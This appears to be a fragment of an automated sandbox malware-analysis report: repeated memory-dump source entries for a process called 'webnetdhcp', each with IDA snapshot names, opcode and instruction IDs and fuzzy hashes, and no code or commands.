                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FindHandleModuleResource
                    • String ID: RTL
                    • API String ID: 3537982541-834975271
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7712ca9622458f288c4ff9d12b47530c54b787850f72bfe9865087e622482044
                    • Instruction ID: 71955fea54a99babd53abaf2821e939d5ea1804fca256310da4217c7efe2cbff
                    • Opcode Fuzzy Hash: 7712ca9622458f288c4ff9d12b47530c54b787850f72bfe9865087e622482044
                    • Instruction Fuzzy Hash: 0631242290E5968FF7419B68C8659F67BB4EF56310F0841F6E14EC30D2DD1C9989C7D2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f90c77470c9966af6552f15c858e7fdc10e85e64d8ffe03a92bb9da3bc617eb
                    • Instruction ID: 1c4850738e0a1f2d7b0a45180ab8ae3019669183a745423f7ccd99efffe627ac
                    • Opcode Fuzzy Hash: 1f90c77470c9966af6552f15c858e7fdc10e85e64d8ffe03a92bb9da3bc617eb
                    • Instruction Fuzzy Hash: 9B31346444F2CA9EEB439B7488705B23FB89F43219B1484EED0DDC6093D958559AC742
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2bfa2233d244212fa1f079b1303c696ce099889ed7c695f50d3d51689276e2f9
                    • Instruction ID: 3081717696586174c456253073b553e167c9f1adfaaa6da7a0ba9e765656e9b2
                    • Opcode Fuzzy Hash: 2bfa2233d244212fa1f079b1303c696ce099889ed7c695f50d3d51689276e2f9
                    • Instruction Fuzzy Hash: BB31AF70D1A61ACFF764DB68C8196EE77F0AF47308F00857AD409D22D2DA3DA908CB85
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 377c769a8ae7edf604ca12de57ab99c715872e2ae86462b07f56243c97a72818
                    • Instruction ID: a77e82cd835804575d52f0a9ff0b34d12338fc9d7738e3cd46066748073709f9
                    • Opcode Fuzzy Hash: 377c769a8ae7edf604ca12de57ab99c715872e2ae86462b07f56243c97a72818
                    • Instruction Fuzzy Hash: 0121DA7190952DCFEB54EB98C498AECB7F1FF59305F108139D00EE7295CA39A844CB54
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f7b1bbcb13ebd8fa0dcb44ea5098248ccfadd6dcdddb0acf199b1bbff15c979
                    • Instruction ID: 9286d46612397494c3c512586e1b8eb33e033f84e06f83bfa749d8973bb2c9c5
                    • Opcode Fuzzy Hash: 0f7b1bbcb13ebd8fa0dcb44ea5098248ccfadd6dcdddb0acf199b1bbff15c979
                    • Instruction Fuzzy Hash: 7C219030C1969E8FE755EB34C8586AA7BA0FF1A304F0489FAD40DC61A6EA39E558C741
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c47422e26126045d9eb5fabeb2f14b324c8d14ac63480dd9b49a39d00e2b2b3
                    • Instruction ID: f9bc074ff5ff1225e1a20b7dce60224c4da8776880a50ae32d0b2dc64ed25493
                    • Opcode Fuzzy Hash: 9c47422e26126045d9eb5fabeb2f14b324c8d14ac63480dd9b49a39d00e2b2b3
                    • Instruction Fuzzy Hash: B4118E6091955E8FF780EBA8C84D5B97BE0FF59354F40C576D81DC20A6EE39A5488780
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c476a23e271ae8e8f93b56c2c884304ad487fa2f5118cc6ef97cea8678432358
                    • Instruction ID: cdac139dd02fea19c80fb4b15d1c65929e98ab4d37a729556e921c44572e2cfb
                    • Opcode Fuzzy Hash: c476a23e271ae8e8f93b56c2c884304ad487fa2f5118cc6ef97cea8678432358
                    • Instruction Fuzzy Hash: 6A119071C0E78ACFE769DF24C8582A97BA0FF16304F0489FAD40DC6195EA39E558C781
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e9ebf68b16a93c175eb7600416cc119403c9ba2b822c2e136af4675119838f1
                    • Instruction ID: 4fa48b181548dc2894cf819997541e1c3ee2d5c97f960c753e2178b58f9346b0
                    • Opcode Fuzzy Hash: 2e9ebf68b16a93c175eb7600416cc119403c9ba2b822c2e136af4675119838f1
                    • Instruction Fuzzy Hash: 60116D3490864ACFDB85EF28C454ABA7BF0FF19305F4445AEE419C72A2DB74E654CB80
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 91ba33a1809981d1d4dfa29e5b0a4cf628229abdff1bd48b8f03fca7580350a8
                    • Instruction ID: cf0a6d9b0d1993f25f1a929a188513dad2756b720966cc2e42b9242d50330543
                    • Opcode Fuzzy Hash: 91ba33a1809981d1d4dfa29e5b0a4cf628229abdff1bd48b8f03fca7580350a8
                    • Instruction Fuzzy Hash: 2B118F3084E79A8FE762EB3488595A93FB0EF17300F06C6F7D008C60A3DA2DE4488751
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 793b2ad7cc0b2bd1a56567ad8a941ad261907377930412db93ab1140d804ddcc
                    • Instruction ID: 06947c2fa99deb3d68ff6b0c35658e3540d8df84f1da593257d7bd2b6dd4b564
                    • Opcode Fuzzy Hash: 793b2ad7cc0b2bd1a56567ad8a941ad261907377930412db93ab1140d804ddcc
                    • Instruction Fuzzy Hash: 9B11607090964E8FEB85EF28C4586BA7BB0FF59305F0085BFD41DC6192DB74A544C780
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a458378ddb745f10f58bc7a26c3025f34089072adf58784b846737107b33c6fe
                    • Instruction ID: 044ae7c67f5f18ce9e3f96407bf4626ba985897a487f65164ce39a4b804510e5
                    • Opcode Fuzzy Hash: a458378ddb745f10f58bc7a26c3025f34089072adf58784b846737107b33c6fe
                    • Instruction Fuzzy Hash: 09118F7094968E8FEB49EF28C4995B93BB0FF1A304F0185BAD40EC71A6CA35E584C781
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d77db08bc0788db11883ddfd77a624d9c6ac31dfb9ed8e64aaf0be18a0efd9a7
                    • Instruction ID: 469f41cdbba98d9918f1745cca9956d74416b0e6122c9e0e464300dd035f67d1
                    • Opcode Fuzzy Hash: d77db08bc0788db11883ddfd77a624d9c6ac31dfb9ed8e64aaf0be18a0efd9a7
                    • Instruction Fuzzy Hash: 3F018C3094991E8FEB48EF24C048AB977A1FF59308F50C57AD80ED2195CA3AA554CB84
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6ea790e51c6a5d980ee0943d46d9c4561a63aa001999c4993fb0d58c97d42cb
                    • Instruction ID: 96d0451e929904dabf8a170b95543f3a02e1aa9d2509ddc42303de7e8ee46fef
                    • Opcode Fuzzy Hash: e6ea790e51c6a5d980ee0943d46d9c4561a63aa001999c4993fb0d58c97d42cb
                    • Instruction Fuzzy Hash: 6601267080950ECFEB84EF24C0596BA37F0FF29305F50857AD40EC2191DA39E594C780
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eaea006455476572fc18c846845cb7261f86d5e1a6db381fbc3cd06c6d07bc8f
                    • Instruction ID: e35fa5c7fb8a45477b678e5c8f8b0e1057d6ccf76b881e19cf948858f7ed1797
                    • Opcode Fuzzy Hash: eaea006455476572fc18c846845cb7261f86d5e1a6db381fbc3cd06c6d07bc8f
                    • Instruction Fuzzy Hash: CD016D3095991ECFEB58EB34C0486B972A0FF19309F10C9BED40ED21D5DF3AA558C640
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c72a5428544897f2c0711c2a08c6d53d5b11e1d1ab08208f5c152a39b6bf687
                    • Instruction ID: d577e52b3c3a357cc0b704c0f9f7dae070ef39ab7b28effeca57edfbe8ca9f86
                    • Opcode Fuzzy Hash: 6c72a5428544897f2c0711c2a08c6d53d5b11e1d1ab08208f5c152a39b6bf687
                    • Instruction Fuzzy Hash: 35016934D5991E9FEB68EB34C4586BA73A0FF19309F1088BEE40ED21D1DE3AA158C640
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1de06217538819317691ffc27d970f151f57828990921b0a88e7d8e1c75ab0e7
                    • Instruction ID: 4620bc384c2ce60043a3cdea06d956112e620e18f401f3c516f9f3d9d899ee7f
                    • Opcode Fuzzy Hash: 1de06217538819317691ffc27d970f151f57828990921b0a88e7d8e1c75ab0e7
                    • Instruction Fuzzy Hash: 71018F7095A64A9FF751EB3C884D5B97BE0EF1A300F4589B6D50CC7066EE38E2888750
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d5b17b35803c68ffa266b044137d987c36050d099999a99e818b4381aba0402
                    • Instruction ID: 804959150a8547df962d6dd83d5a7500fd8b0fa46dfb573bbe0ddf427f110b99
                    • Opcode Fuzzy Hash: 7d5b17b35803c68ffa266b044137d987c36050d099999a99e818b4381aba0402
                    • Instruction Fuzzy Hash: C5F0623084A65ECFEB54EF34D4196FA77A4EF16308F50C57AE80ED2191CA3AE554CB84
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f526e0dc14e66b982101c46a56b3e574e13cde225dd0a34b53bb6adc6e75773
                    • Instruction ID: 569f317a564a1d34ed3a07941638ac8f0da741ce05a0d7192914988533ad5902
                    • Opcode Fuzzy Hash: 9f526e0dc14e66b982101c46a56b3e574e13cde225dd0a34b53bb6adc6e75773
                    • Instruction Fuzzy Hash: 61018130E0551D8BEB40DB58C884AEEB7B0EF48325F108175D40DE7240EE38A844CF84
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d690abac2de1013303b14196c0c3399aa666e7fe506d77eadfa285294d1652a3
                    • Instruction ID: dd6d7f2d8297638a2a0253f5a433a0b9531ff5921bae3928431434984c5dfd82
                    • Opcode Fuzzy Hash: d690abac2de1013303b14196c0c3399aa666e7fe506d77eadfa285294d1652a3
                    • Instruction Fuzzy Hash: 9CF0C23080A65ECFFB58DF24C4585B93BA0FF56308F408539E80DD2190CA3AD554C780
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c936c031cddcf4946c6a6f48340af2fee273d5ccfb7af763113befc6721fa3b
                    • Instruction ID: 93244d33378907cc6d7fb300573fda2181acac08fc994ab14b55eb264c548a52
                    • Opcode Fuzzy Hash: 4c936c031cddcf4946c6a6f48340af2fee273d5ccfb7af763113befc6721fa3b
                    • Instruction Fuzzy Hash: D3F06D2181F296DBF716535C54110F93B349F03301F4681B7E54DC6082DE18EA8C53D6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 895fdbc0117dc65a8b66e8375658ea22f46d8c017a0b71bab05d7230d0d29f22
                    • Instruction ID: 0ecd766f0306a5a353831e339b8cb1fd0b3f379404c9e6f5baf2a6ea350a2906
                    • Opcode Fuzzy Hash: 895fdbc0117dc65a8b66e8375658ea22f46d8c017a0b71bab05d7230d0d29f22
                    • Instruction Fuzzy Hash: 5CF0B434D5E65ECFFB289B34C8591BA7760FF06308F00C9BAE41EC11D1EA39A158C681
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ded08a8edc3fb4c734d2cc8673590ad33802801aae82b91e804eb242c9d5921
                    • Instruction ID: 8b581e7643d260fd8221002ad24bf102daa7238ff172609b8f5a55889211177f
                    • Opcode Fuzzy Hash: 9ded08a8edc3fb4c734d2cc8673590ad33802801aae82b91e804eb242c9d5921
                    • Instruction Fuzzy Hash: 7FF0627180E789CFEB69DB2488595A93BA0BF56209F4086BEE40DC51D2DB29D458C741
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 73ec320ab9bf02b9cd1c91cc816ed8ffd17bcb31a2a43be471e74097600e1a6f
                    • Instruction ID: aa5d1540aee080f7cf5f5517d8f876aad59f69eb0a4ee794d83bbbd7e7d3b9ea
                    • Opcode Fuzzy Hash: 73ec320ab9bf02b9cd1c91cc816ed8ffd17bcb31a2a43be471e74097600e1a6f
                    • Instruction Fuzzy Hash: C8F0797091952D8FEB90EF64C8497AD77B1FF59304F5081A5940DD3292CA38A9848F95
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: "$0$5$W
                    • API String ID: 0-4047843982
                    • Opcode ID: 533c4daf156ceb113325a784b1c9bcc1420f6eca4917c7800f26d4c0613cdd73
                    • Instruction ID: 87fb78df8fe820e32c11aec1de45d2cac639decead1242a4f3c06f3835899b34
                    • Opcode Fuzzy Hash: 533c4daf156ceb113325a784b1c9bcc1420f6eca4917c7800f26d4c0613cdd73
                    • Instruction Fuzzy Hash: B421C974D0562ACBFB68CF04C894BFDB7B1AB55305F5081AAC10DA7290CA796AC5CF94